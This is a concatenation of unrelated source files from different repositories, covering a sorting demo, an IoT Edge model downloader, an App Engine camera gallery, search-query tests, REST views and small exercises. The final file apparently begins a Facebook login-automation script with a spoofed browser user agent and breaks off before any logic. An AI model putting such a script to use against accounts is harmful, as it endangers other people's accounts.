ff91889dcdaa347c138e4b81f3c25c581ec6ac76 | f3c380495cda1fe7d791c421216bc3d373b44b5a | /lambda.py | ef1b5c3f683d7538fc93d2b877bc9f34727b55ee | [] | no_license | siwangqishiq/PythonLearn | 01c63703b1dafbf4eec27a7b6e6846413045efb3 | 275b1becb1be9cca566956e6f58088e983e68208 | refs/heads/master | 2021-08-23T10:19:52.189996 | 2017-11-12T06:33:20 | 2017-11-12T06:33:20 | 105,995,836 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 262 | py |
def main():
data = [{"name":"毛利兰","age":17},{"name":"工藤新","age":18},{"name":"鲁鲁修","age":16},{"name":"夜神月","age":20}]
for d in data:
print(d)
print("="*50)
data.sort(key = lambda x:x["age"])
for d in data:
print(d)
main()
| [
"525647740@qq.com"
] | 525647740@qq.com |
34a8a5d6bf82521b2d655e068ef808d27f366861 | 13fa7bc8ac70b217382459a136b0125813328410 | /Util/SocketServer.py | bb3a83b9d06070420d323a74df2e648676fb1875 | [] | no_license | Leia1002/Rizhao-master0803 | ca8ba452aa52d99301aec0a120690729d49ce90d | b5d2427eb96068fdcaa57402ad3b11f36aca3736 | refs/heads/master | 2020-03-25T04:44:10.661627 | 2018-08-28T12:45:33 | 2018-08-28T12:45:33 | 143,410,785 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,611 | py | # -*- coding: utf-8 -*-
import threading
import time
from Util.Dispatch import Dispatch
'''
此处以后再加入java互动
开始线程,本类其实是一个定时器作用
'''
class SocketServer(object):
def everyMonth(self):
while True:
lock = True
# todo:bug 此处循环无数次,如何设置为一次
if time.strftime("%d") == '1' and lock == True:
dispatchInstantiation = Dispatch()
dispatchInstantiation.dispatch('everyMonth')
lock = False
pass
if time.strftime("%d") == '2':
lock = True
def everyDay(self):
while True:
current_time = time.localtime(time.time())
if (current_time.tm_hour == 0) and (current_time.tm_min == 0) and (current_time.tm_sec == 0):
dispatchInstantiation = Dispatch()
dispatchInstantiation.dispatch('everyDay')
time.sleep(1)
pass
def everyHour(self):
while True:
current_time = time.localtime(time.time())
if (current_time.tm_min == 0) and (current_time.tm_sec == 0):
dispatchInstantiation = Dispatch()
dispatchInstantiation.dispatch('everyHour')
time.sleep(1)
def startProject(self):
t1 = threading.Thread(target=self.everyHour, name='everyHour')
t2 = threading.Thread(target=self.everyDay, name='everyDay')
t3 = threading.Thread(target=self.everyMonth, name='everyMonth')
t1.start()
t2.start()
t3.start()
| [
"mafei@Hisense.ad"
] | mafei@Hisense.ad |
4ef4c33489c9c34b2e73cd65241fe22cde9f4cb9 | 6a5732f38be806ffa0a8f44a687e74035fab24b8 | /factory-ai-vision/EdgeSolution/modules/PredictModule/utility.py | d810717a8e61be9ed01af770a35147dd2f4db344 | [
"MIT"
] | permissive | dlepow/azure-intelligent-edge-patterns | ccf92a29c95a419cae29142fb620a2bc14745f44 | 60ca7203115bdf26932e7bc037c37b2a7dac5756 | refs/heads/master | 2023-03-09T17:22:03.827655 | 2021-02-05T14:19:00 | 2021-02-05T14:19:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,243 | py | # Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE file in the project root for
# full license information.
import glob
import json
import logging
import os
import shutil
import socket
import subprocess
import subprocess as sp
import sys
import time
import urllib.request as urllib2
import zipfile
from urllib.request import urlopen
import cv2
from azure.iot.device import IoTHubModuleClient
logger = logging.getLogger(__name__)
# this function returns the device's outbound LAN ip address; it falls back to the docker bridge address 172.17.0.1 on failure or when a 172.x docker interface address is detected
def getWlanIp():
    """Return the device's outbound IP address as a string.

    Opens a UDP socket towards a broadcast address (no packet is actually
    sent) so the OS selects the outgoing interface. Addresses starting with
    172 are treated as the Docker bridge and normalised to 172.17.0.1; any
    socket failure also falls back to 172.17.0.1.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # doesn't even have to be reachable; connect() on UDP only picks a route
        s.connect(("10.255.255.255", 1))
        IP = s.getsockname()[0]
        if IP.split(".")[0] == "172":
            print("Ip address detected is :: " + IP)
            # 172.x is assumed to be the docker interface, not the real LAN IP
            IP = "172.17.0.1"
            print("Ip address changed to :: " +
                  IP + " to avoid docker interface")
        print("Ip address detected is :: " + IP)
    except OSError:
        # narrowed from a bare except: only socket/routing failures fall back
        IP = "172.17.0.1"
    finally:
        s.close()
    return IP
# this function prepares the camera folder, clearing any previous models the device may have
def prepare_folder(folder):
    """Reset *folder* to an empty directory.

    If the directory already exists its contents are removed first; the
    directory is then (re)created, so callers always get an empty folder.
    """
    # Fix: print() does not lazy-format "%s" args the way logging does;
    # the original printed the literal "%s" followed by the folder name.
    print("Preparing: %s" % folder)
    if os.path.isdir(folder):
        print("Found directory cleaning it before copying new files...")
        shutil.rmtree(folder, ignore_errors=True)
    # Covers both branches of the original (existing dir and missing dir).
    os.makedirs(folder, exist_ok=True)
def WaitForFileDownload(FileName):
    """Block until *FileName* exists and can be opened.

    Polls once per second; each failed attempt prints a progress message.
    Returns None once the file is readable.
    """
    while True:
        try:
            with open(FileName):
                break
        except IOError:
            print("Still downloading...", flush=True)
            time.sleep(1)
    print("Got it ! File Download Complete !", flush=True)
def get_file(url, dst_folder="/app/vam_model_folder"):
    """Download the file at *url* into *dst_folder*.

    The file name is taken from the final URL after redirects, so this works
    even when the caller's *url* does not end with a file name.  Returns True
    on success, False when no file name can be derived from the URL.
    NOTE(review): assumes *dst_folder* already exists — confirm callers
    create it first.
    """
    # Follow redirects first so the file name can be read from the final URL.
    remotefile = urlopen(url)
    myurl = remotefile.url
    FileName = myurl.split("/")[-1]
    if FileName:
        # find root folders
        dirpath = os.getcwd()  # NOTE(review): unused; only the commented-out src line below used it
        # src = os.path.join(dirpath,"model")
        dst = os.path.abspath(dst_folder)
        logger.info("Downloading File :: %s", FileName)
        urllib2.urlretrieve(url, filename=(os.path.join(dst, FileName)))
        # Block until the downloaded file is actually readable on disk.
        WaitForFileDownload(os.path.join(dst, FileName))
        return True
    else:
        print("Cannot extract file name from URL")
        return False
def get_file_zip(url, dst_folder="model"):
    """Download a zip archive from *url* and extract it into *dst_folder*.

    The archive name is read from the final URL after redirects.  The
    destination folder (relative to the current working directory) is wiped
    via prepare_folder() before downloading; the archive is fetched with the
    external ``wget`` binary and then passed to unzip_and_move().  Returns
    the result of unzip_and_move() on success, False when no file name can
    be derived from the URL.
    """
    # The file name may not be part of the original URL; read it from the
    # final (redirected) URL instead.
    print("Downloading: %s" % url, flush=True)
    remotefile = urlopen(url)
    myurl = remotefile.url
    FileName = myurl.split("/")[-1]
    print(FileName, flush=True)
    if FileName:
        # find root folders
        dirpath = os.getcwd()
        dirpath_file = os.path.join(dirpath, dst_folder)
        src = os.path.abspath(dirpath_file)
        src_file_path = os.path.join(src, FileName)
        print("Location to download is :: %s" % src_file_path, flush=True)
        # Empty (or create) the destination folder before downloading into it.
        prepare_folder(dirpath_file)
        print("Downloading File :: %s" % FileName, flush=True)
        # urllib2.urlretrieve(url, filename=src_file_path)
        # NOTE(review): relies on the external `wget` binary being installed.
        subprocess.run(["wget", "-O", src_file_path, url])
        print("Downloading File :: %s, complete!" % FileName, flush=True)
        print("Unzip and move...", flush=True)
        print(
            "src_file_path: {}, dst_file_path: {}".format(
                src_file_path, dst_folder),
            flush=True,
        )
        result = unzip_and_move(src_file_path, dst_folder)
        print("Unzip and move... Complete!", flush=True)
        return result
    else:
        print("Cannot extract file name from URL", flush=True)
        return False
def unzip_and_move(file_path=None, dst_folder="model"):
    """Extract the zip archive at *file_path* into *dst_folder*.

    Uses the stdlib ``zipfile`` module instead of shelling out to an
    external ``unzip`` binary, so it works on hosts without that tool and
    raises ``zipfile.BadZipFile`` on a corrupt archive instead of silently
    returning success (the subprocess return code was never checked).
    Returns True once extraction completes.
    """
    with zipfile.ZipFile(file_path, "r") as zip_ref:
        zip_ref.extractall(dst_folder)
    return True
# this function pushes a new model to the device location /data/misc/camera, mounted at /app/vam_model_folder
def transferdlc(pushmodel=None, src_folder="model"):
    """Push the model, labels and VA engine config to the device folder
    (/data/misc/camera on the device, mounted at /app/vam_model_folder).

    When *pushmodel* is falsy, the transfer still happens if the device has
    no model on it at all; otherwise it is skipped.
    """
    if not pushmodel:
        if checkmodelexist():
            print(
                "Not transferring model as transfer from container is disabled by settting pushmodel to False"
            )
            return
        print(
            " transferring model as the device does not have any model on it even if pushmodel is set to False"
        )
    else:
        print(
            "transferring model ,label and va config file as set in create option with -p %s passed"
            % pushmodel
        )
    # Resolve the container-side source and the device-side target.
    model_dir = os.path.join(os.getcwd(), src_folder)
    device_dir = os.path.abspath("/app/vam_model_folder")
    # The VA engine config names the DLC model and label files to ship.
    config_path = find_file(model_dir, "va-snpe-engine-library_config.json")
    with open(config_path) as fh:
        engine_cfg = json.load(fh)
    payload = [
        config_path,
        find_file(model_dir, engine_cfg["DLC_NAME"]),
        find_file(model_dir, engine_cfg["LABELS_NAME"]),
    ]
    print("Found model files: {} in {}".format(payload, model_dir))
    # Clean the target, then copy the three files across.
    prepare_folder(device_dir)
    for path in payload:
        print("transfering file :: " + path)
        shutil.copy(path, device_dir)
def checkmodelexist():
    """Return True when a .dlc model is already present on the device mount."""
    matches = glob.glob("/app/vam_model_folder/*.dlc")
    if not matches:
        print("No dlc or tflit model on device")
        return False
    return True
def send_system_cmd(cmd):
    """Run *cmd* through the shell and print its exit status.

    NOTE(review): ``shell=True`` with a caller-supplied string is a shell
    injection risk if *cmd* can ever contain untrusted input — verify callers.
    """
    print("Command we are sending is ::" + cmd)
    # `sp` is a subprocess alias imported elsewhere in this module.
    returnedvalue = sp.call(cmd, shell=True)
    print("returned-value is:" + str(returnedvalue))
# this function will find the required files to be transferred to the device
def find_file(input_path, suffix):
    """Return the path of the single file named *suffix* under *input_path*.

    Walks the tree recursively; raises ValueError unless exactly one file
    with that exact name is found.
    """
    files = [
        os.path.join(dp, f)
        for dp, dn, filenames in os.walk(input_path)
        for f in filenames
        if f == suffix
    ]
    if len(files) != 1:
        raise ValueError(
            "Expecting a file ending with %s file as input. Found %s in %s. Files: %s"
            % (suffix, len(files), input_path, files)
        )
    # os.walk already yields paths rooted at input_path, so re-joining with
    # input_path (as the old code did) duplicated the prefix for relative
    # paths and only worked by accident when callers passed absolute paths.
    return files[0]
# get the model path from confgiuartion file only used by Azure machine learning service path
def getmodelpath(model_name):
    """Resolve *model_name* to a filesystem path via model_config_map.json.

    Only used on the Azure Machine Learning service path.  Model ids are
    stored as colon-separated path segments; when *model_name* is None an
    arbitrary entry of the map is used (dict.popitem).
    """
    config_file = os.path.join(sys.path[0], "model_config_map.json")
    with open(config_file) as cfg:
        data = json.load(cfg)
    print(data)
    models = data["models"]
    if not models:
        raise ValueError("no models found")
    if model_name is None:
        # Fall back to some entry of the map when no name was requested.
        model_name, model_data = models.popitem()
    else:
        model_data = models[model_name]
    model_id = model_data["id"]
    print("using model %s" % model_id)
    # "a:b:c" -> os.path.join("a", "b", "c")
    return os.path.join(*model_id.split(":"))
def normalize_rtsp(rtsp: str) -> str:
    """Lower-case a leading RTSP scheme: ``RTSP://xxx`` -> ``rtsp://xxx``.

    Non-string input and strings without a leading rtsp scheme are returned
    unchanged.
    """
    if isinstance(rtsp, str) and rtsp.lower().startswith("rtsp"):
        return "rtsp" + rtsp[4:]
    return rtsp
# if __name__ == "__main__":
# get_file_zip("https://yadavsrorageaccount01.blob.core.windows.net/visionstoragecontainer/a5719e7549c044fcaf83381a22e3d0b2.VAIDK.zip","twin_provided_model")
def draw_label(img, text, pos, rectangle_color=(255, 255, 255), text_color=(0, 0, 0)):
    """Draw *text* at *pos* on *img* over a filled background rectangle."""
    x, y = pos
    # Background box sized roughly to the text (5 px per character + padding).
    img = cv2.rectangle(
        img, (x, y - 15), (x + len(text) * 5 + 10, y), rectangle_color, -1
    )
    img = cv2.putText(
        img,
        text,
        (x + 5, y - 5),
        cv2.FONT_HERSHEY_SIMPLEX,
        0.3,  # font scale
        text_color,
        1,  # thickness
    )
    return img
# Create the IoT Hub module client eagerly at import time; outside an IoT
# Edge deployment this raises, and we fall back to iot = None.
try:
    iot = IoTHubModuleClient.create_from_edge_environment()
except Exception:
    iot = None
def is_edge():
    """Return True when running inside an IoT Edge environment.

    Probes the environment by attempting to build a module client.
    """
    try:
        IoTHubModuleClient.create_from_edge_environment()
    except Exception:
        return False
    return True
| [
"ronpai0919@gmail.com"
] | ronpai0919@gmail.com |
5175327d4e1008c88bb99408d5bb2c97b9319872 | 9a116b59c4f05e18a4899dd4aa544e9f73e4a680 | /main.py | 4c353f3f34d07ead92107133e104399fa1c1cef4 | [
"MIT"
] | permissive | grostein/security_cam_storage_App_Engine | 3734e11996a682ad07b0993dc479cd97ee665b8f | b4cceeeff1468068cb03b68efa6300d620c026a6 | refs/heads/master | 2021-01-10T10:58:37.406210 | 2015-12-30T10:57:28 | 2015-12-30T10:57:28 | 48,793,695 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,963 | py | import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
from modelli import *
from datetime import datetime, timedelta
from email import email
import logging
def sicurezza(self):
    # Access guard shared by all handlers: only the configured address
    # (the `email` constant imported from email.py) may view pages.
    # Other logged-in users are sent to /privato; anonymous visitors are
    # redirected to the App Engine login page.
    user = users.get_current_user()
    if user:
        if user.email() == email:
            pass
        else:
            self.redirect('/privato')
    else:
        self.redirect(users.create_login_url("/"))
class ViewHandler(webapp2.RequestHandler):
    # Serve the raw image bytes stored in the UserFile datastore entity
    # whose key name is <fileid>.
    def get(self, fileid):
        k = ndb.Key(UserFile, fileid)
        userfile = k.get()
        self.response.headers['Content-Type'] = 'image'
        self.response.write(userfile.filedata)
class LastHandler(webapp2.RequestHandler):
    # Redirect to the most recent capture of the last 24 hours.
    def get(self):
        yesterday = datetime.now() - timedelta(1)
        qry = UserFile.query(UserFile.date > yesterday).order(-UserFile.date).fetch(1)
        # NOTE(review): qry[0] raises IndexError when nothing was uploaded
        # in the last day — confirm an upload job always runs.
        self.redirect('/view_file/%s' % qry[0].filename)
class PrivatoHandler(webapp2.RequestHandler):
    # Landing page for authenticated users who are not the configured
    # owner (Italian: "this page is private, access strictly forbidden").
    def get(self):
        self.response.write('Questa pagina è privata. Accesso severamente vietato!')
class PuliziaHandler(webapp2.RequestHandler):
    """Cleanup endpoint: delete stored captures older than five days."""

    def get(self):
        cutoff = datetime.now() - timedelta(5)
        stale_files = UserFile.query(UserFile.date < cutoff).order(UserFile.date).fetch(1000)
        for stale in stale_files:
            stale.key.delete()
def html(self, mobile=False):
    # Render the thumbnail gallery of the last two days of captures.
    # *self* is the calling RequestHandler; with mobile=True only the 12
    # most recent images are shown.
    yesterday = datetime.now() - timedelta(2)
    qry = UserFile.query(UserFile.date > yesterday).order(-UserFile.date)
    if mobile == True:
        qry = qry.fetch(12)
    testo = ''
    # Build one Bootstrap thumbnail cell per stored image.
    for elemento in qry:
        testo += '<div class="col-xs-6 col-md-2"><a href="/view_file/%s" class="thumbnail"> <img src="/view_file/%s"></a>' % (elemento.filename, elemento.filename)
        testo += '<div class="caption"> <p class="text-info">%s</p> </div> </div>' % elemento.date
    self.response.write('''<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Sicurezza</title>
<link href="css/bootstrap.min.css" rel="stylesheet">
<!--[if lt IE 9]>
<script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
<script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
<![endif]-->
</head>
<body>
<div class="container-fluid">
%s
</div>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="js/bootstrap.min.js"></script>
</body>
</html>''' % testo)
class MainHandler(webapp2.RequestHandler):
    # Desktop gallery: access check, then render the full page.
    def get(self):
        sicurezza(self)
        html(self)
class MobileHandler(webapp2.RequestHandler):
    # Mobile gallery: same access check, limited to the newest 12 images.
    def get(self):
        sicurezza(self)
        html(self, mobile=True)
app = webapp2.WSGIApplication([('/', MainHandler),
('/privato', PrivatoHandler),
('/last', LastHandler),
('/pulizia', PuliziaHandler),
('/mobile', MobileHandler),
('/view_file/([^/]+)?', ViewHandler)
], debug=True) | [
"massimiliano@iviaggidellemeraviglie.com"
] | massimiliano@iviaggidellemeraviglie.com |
744efb60853dbb0d6435abca149d3b53b7da4457 | 641ff329536c95de473e9dfdeeb844f0eb6948b6 | /backend/tests/search/query_builder/test_create_query_filter.py | 01dc341f947b762f606816180ad34570ab6be609 | [
"MIT"
] | permissive | dnum-mi/cartographie-donnees | 573a852f685180c7a6657f11a977ecedf7f0541d | 26850923764ab4173b6824dff5c6bb3dbb753915 | refs/heads/main | 2023-08-16T04:26:41.158107 | 2023-01-20T13:01:14 | 2023-01-20T13:01:14 | 416,670,629 | 11 | 7 | MIT | 2023-03-30T14:29:31 | 2021-10-13T09:24:45 | JavaScript | UTF-8 | Python | false | false | 3,778 | py | from typing import List
from pytest_unordered import unordered
from app.models import Organization
from app.search.enums import Strictness
from app.search.query_builder import create_query_filter
def test_query_with_filters_and_text(sample_organizations: List[Organization]):
    """Full query: free text + organization filters + excluded words."""
    query = create_query_filter(
        'test',
        {'organization': ['MI > DGPN', 'INSEE > SG']},
        Strictness.ALL_WORDS,
        'mots à exclure',
        ['name', 'description'],
    )
    assert query == {
        'query': {
            'bool': {
                "must": [{
                    'query_string': {
                        'query': '*test*',
                        'default_operator': 'AND',
                        'fields': ['name', 'description'],
                    },
                }, {
                    "bool": {
                        "should": unordered([{
                            'term': {
                                "organization_name.keyword": 'MI > DGPN'
                            }
                        }, {
                            'term': {
                                "organization_name.keyword": 'INSEE > SG'
                            }
                        }]),
                        "minimum_should_match": 1
                    }
                }],
                "must_not": {
                    'query_string': {
                        'query': '*mots* *à* *exclure*',
                        'fields': ['name', 'description'],
                    }
                }
            }
        },
    }
def test_query_only_with_text(sample_organizations: List[Organization]):
    """Free-text query with no filters: only must + must_not clauses."""
    query = create_query_filter(
        'test',
        {},
        Strictness.ALL_WORDS,
        'mots à exclure',
        ['name', 'description'],
    )
    assert query == {
        'query': {
            'bool': {
                "must": [{
                    'query_string': {
                        'query': '*test*',
                        'default_operator': 'AND',
                        'fields': ['name', 'description'],
                    },
                }],
                "must_not": {
                    'query_string': {
                        'query': '*mots* *à* *exclure*',
                        'fields': ['name', 'description'],
                    }
                }
            }
        }
    }
def test_query_only_with_filters(sample_organizations: List[Organization]):
    """Filter-only query (blank text): organization terms in a should-block."""
    query = create_query_filter(
        '',
        {'organization': ['MI > DGPN', 'INSEE > SG']},
        Strictness.ALL_WORDS,
        'mots à exclure',
        ['name', 'description'],
    )
    assert query == {
        'query': {
            'bool': {
                "must": [{
                    "bool": {
                        "should": unordered([{
                            'term': {
                                "organization_name.keyword": 'MI > DGPN'
                            }
                        }, {
                            'term': {
                                "organization_name.keyword": 'INSEE > SG'
                            }
                        }]),
                        "minimum_should_match": 1
                    }
                }],
                "must_not": {
                    'query_string': {
                        'query': '*mots* *à* *exclure*',
                        'fields': ['name', 'description'],
                    }
                }
            }
        },
    }
def test_blank_query():
    """No text and no filters must degrade to a match_all query."""
    query = create_query_filter(
        '',
        {},
        Strictness.ALL_WORDS,
        'mots à exclure',
        ['name', 'description'],
    )
    assert query == {
        'query': {
            'match_all': {},
        },
    }
| [
"yann.carfantan@artelys.com"
] | yann.carfantan@artelys.com |
5211a4898c1a211510a8046ed40929d34e12d441 | 867437c13bad3c10c2c2e78eeab0827b6a46c754 | /app/main.py | 3d62cd7d3f6cc56e31c2739ea35420cc57ee08f3 | [] | no_license | BoredTweak/heroku-api-redis-demo | 40e6fe34a2c884297ccc7fc4fb211eb62781e780 | fc024821467a5ba4b59821b8020437845108f3f0 | refs/heads/main | 2023-07-25T02:53:09.298035 | 2021-08-25T16:18:26 | 2021-08-25T16:18:26 | 399,864,452 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 605 | py | import threading
import redis
import sys
import time
from fastapi import FastAPI
import os
from dotenv import load_dotenv
load_dotenv()  # pull settings from a local .env file in development
# Redis connection parameters come from the environment; REDIS_PORT must
# be set or the int() conversion in the handlers below will fail.
hostAddress = os.environ.get('REDIS_URL')
port = os.environ.get('REDIS_PORT')
# All routes are served under the /api root path.
app = FastAPI(root_path='/api')
@app.get('/heartbeat')
def get_heartbeat():
    # Return the last stored heartbeat value from Redis (None when no
    # heartbeat has been posted yet).
    # NOTE(review): a new Redis connection is opened on every request —
    # consider a shared client if this endpoint becomes hot.
    r = redis.Redis(host=hostAddress, port=int(port))
    return r.get("heartbeat")
@app.post('/heartbeat')
def set_heartbeat():
    # Store the current UNIX timestamp as the heartbeat value.
    r = redis.Redis(host=hostAddress, port=int(port))
    r.set("heartbeat", time.time())
    return True
@app.get('/health')
def get_health():
    # Echo the configured Redis endpoint so deployments can be sanity-checked.
    return f'{hostAddress} - {port}'
| [
"alex.elia37@gmail.com"
] | alex.elia37@gmail.com |
a341ca2afe835fa5c459a897d33b89eeafb9f226 | 8e7421d340586a8d1d93304add04daf51506ada5 | /image_beautify/image_histogram_equalization.py | 26e976a007184c7c29e401198ffed20170f226d0 | [] | no_license | wddzz/opencv_and_tensorflow_study | a419d5d951be1ba52cbdbc3aafafb93092e643f1 | f89639af5268df00899601fa0e525afa0b63a713 | refs/heads/master | 2020-03-22T16:01:34.602285 | 2018-08-01T15:57:18 | 2018-08-01T15:57:18 | 140,297,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 791 | py | import cv2
import numpy as np
# Histogram-equalization demo: equalize only the luma (Y) channel in
# YCrCb space so colors are preserved while contrast is stretched.
img0 = cv2.imread("H:\\Files\\image_process\\damimi.jpg",1)
# Grayscale histogram equalization (alternative approach):
# gray = cv2.cvtColor(img0,cv2.COLOR_BGR2GRAY)
# dst = cv2.equalizeHist(gray)
# Per-channel color histogram equalization (alternative approach):
# (b,g,r) = cv2.split(img0)
# bdst = cv2.equalizeHist(b)
# gdst = cv2.equalizeHist(g)
# rdst = cv2.equalizeHist(r)
# dst = cv2.merge((bdst,gdst,rdst))# merge the channels back together
# YUV (YCrCb) equalization:
imgYUV = cv2.cvtColor(img0,cv2.COLOR_BGR2YCrCb)
channalYUV = cv2.split(imgYUV)
channalYUV[0] = cv2.equalizeHist(channalYUV[0])
channals = cv2.merge(channalYUV)
dst = cv2.cvtColor(channals,cv2.COLOR_YCrCb2BGR)
# Show source and result in resizable windows.
cv2.namedWindow("src",0)
cv2.resizeWindow("src",240,480)
cv2.imshow("src",img0)
cv2.namedWindow("dst",0)
cv2.resizeWindow("dst",240,480)
cv2.imshow("dst",dst)
cv2.waitKey(0) | [
"406452653@qq.com"
] | 406452653@qq.com |
2eef82d1bf14b03fe93199ebb554bad4dae8ae0a | ec3f9f1b1327ec8a69bd2fc056cdb2dbf7c243d3 | /week_1/Solution_4.py | 7651516d57b86a5b26049840c54e0379842a2db2 | [] | no_license | WhiteFeniks/Python_Cursera | e5d7e04c40eb586a9763f38de55c88cfb77318a4 | 0dbb85f0a225e7152599bbea75e1637d8f4dd04c | refs/heads/master | 2022-11-15T22:39:35.663524 | 2020-07-11T16:55:39 | 2020-07-11T16:55:39 | 278,734,455 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32 | py | n = int(input())
# 2**n is exact here: Python ints are arbitrary precision, so no overflow.
print (2**n)
| [
"macbookair@White-Fang-Mac.local"
] | macbookair@White-Fang-Mac.local |
fdfd405481a69ee32d75908d3217785d365d90a4 | f6fafb196e9e68e3f849ec4dfa4046632380c822 | /100 days of code/day 17/quiz_brain.py | 450561a3478070d271164a21cc5acb2a8888923b | [] | no_license | Juozapaitis/100daysOfCodeUdemy | 77f0f2c658952e6bed5d776ff135233d96328471 | 4de48a778ea438f5c36f6d9638c3c01a7d7437ff | refs/heads/master | 2023-09-02T04:53:47.604007 | 2021-10-20T08:42:04 | 2021-10-20T09:30:00 | 419,249,733 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 941 | py | class QuizBrain():
    def __init__(self, questions_list):
        """Build a quiz over *questions_list* (objects with .text/.answer)."""
        self.question_number = 0  # index of the next question to ask
        self.score = 0  # number of correct answers so far
        self.questions_list = questions_list
def next_question(self):
current_question = self.questions_list[self.question_number]
self.question_number += 1
user_answer = input(f"Q.{self.question_number}: {current_question.text} (True/False): ")
self.check_answer(user_answer, current_question.answer)
def still_has_questions(self):
return self.question_number < len(self.questions_list)
def check_answer(self, user_answer, correct_answer):
if user_answer.lower() == correct_answer.lower():
print("You got it right!")
self.score += 1
else:
print("That's wrong.")
print(f"The correct answer was: {correct_answer}.")
print(f"Your current score is: {self.score}/{self.question_number}")
print("") | [
"justasjuozapaitis65@gmail.com"
] | justasjuozapaitis65@gmail.com |
618d26a1de085c3b232b50f8a719c096a1a4c389 | b5ca0a2ce47fdb4306bbdffcb995eb7e6eac1b23 | /Python/Regex and Parsing/Validating phone numbers/attempt2.py | 2b2d832379b0eb3a6171a2ff4bfd378358e9b641 | [] | no_license | rsoemardja/HackerRank | ac257a66c3649534197b223b8ab55011d84fb9e1 | 97d28d648a85a16fbe6a5d6ae72ff6503a063ffc | refs/heads/master | 2022-04-14T22:46:03.412359 | 2020-04-03T07:44:04 | 2020-04-03T07:44:04 | 217,687,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | import re
# HackerRank "Validating phone numbers": a mobile number is valid when it
# is exactly ten digits long and starts with 7, 8 or 9.
n = int(input())
for _ in range(n):
    # Raw string avoids the invalid "\d" escape warning; fullmatch anchors
    # both ends so no extra characters can slip through; identity checks
    # against None use `is not None` per PEP 8.
    if re.fullmatch(r'[789]\d{9}', input()) is not None:
        print('YES')
    else:
        print('NO')
"rsoemardja@gmail.com"
] | rsoemardja@gmail.com |
7cc0f99a45c4afebcd51d2a614f223eba92ad6fd | e2561aaf3fec80646c0c44fa369d062865bd8f39 | /backend/tests/views.py | eced51ac47ebd25216bd2576375aff6912fed3bf | [] | no_license | prakritimaddheshiya/tests | b4fb2ba91f7d51d6f4c5dd2da0a8a38c3ff8fd29 | 91cffb07fa0ab674b0e49e11b6f8d5c39159357e | refs/heads/main | 2023-04-20T15:59:08.619385 | 2021-05-17T11:26:57 | 2021-05-17T11:26:57 | 368,150,110 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 968 | py | from rest_framework import status
from rest_framework.response import Response
from rest_framework.views import APIView
from .models import Tests
from .serializers import TestsSerializer
class TestsCreateView(APIView):
    """Create a Tests record from the request payload."""

    def post(self, request):
        serializer = TestsSerializer(data=request.data)
        # Guard clause: reject invalid payloads with the validation errors.
        if not serializer.is_valid():
            return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
        serializer.save()
        return Response(serializer.data, status=status.HTTP_200_OK)
class TestsListView(APIView):
    """Return every Tests record, serialized as a list."""

    def get(self, request):
        queryset = Tests.objects.all()
        payload = TestsSerializer(queryset, many=True).data
        return Response(payload, status=status.HTTP_200_OK)
class TestsDetailView(APIView):
    """Retrieve a single Tests record by id."""

    def get(self, request, test_id):
        # An unknown id used to bubble up as an unhandled DoesNotExist
        # (HTTP 500); answer with a proper 404 instead.
        try:
            test = Tests.objects.get(id=test_id)
        except Tests.DoesNotExist:
            return Response(status=status.HTTP_404_NOT_FOUND)
        serializer = TestsSerializer(test)
        return Response(serializer.data, status=status.HTTP_200_OK)
| [
"ayushgupta0010@gmail.com"
] | ayushgupta0010@gmail.com |
d8d5fb0ee104918f31eeef19697fffe2a9eb2015 | 9e5c864130ba4f9ae257ba0709cda1263f7b402a | /teststr.py | 0a54138cc9d82da409060d28364758c3a99d0adb | [] | no_license | LBJ-Max/basepython | ee7ce77247f92de009b0724d2656d3ddbd085130 | b7c2ee2af628125584372371389598fe81708468 | refs/heads/master | 2020-06-25T11:27:40.459374 | 2019-07-28T14:21:56 | 2019-07-28T14:21:56 | 199,296,609 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | hello_str = "hello world"
# 1. Length of the string
print(len(hello_str))
# 2. Number of occurrences of a substring
times = hello_str.count("l")
print(times)
# 3. Position (first index) where a substring appears
print(hello_str.index("llo")) | [
"fenggaopan@dangdang.com"
] | fenggaopan@dangdang.com |
565f68b1cd1ccd748262cc61ea4bcdfe3a049ade | 42362ce3f8da59b0ba70a844243d1323221c084c | /umari.py | 4229ba2d347f356b60df256af1f114bf5cd8e5a6 | [] | no_license | Umaritfs/fb | 3c741099ca013b28775f0078459ed45454c353da | c69dbbc930106cbfe1d5625b247831a77a14dc9c | refs/heads/master | 2022-04-24T12:14:33.531320 | 2020-04-30T09:08:06 | 2020-04-30T09:08:06 | 260,159,938 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,013 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
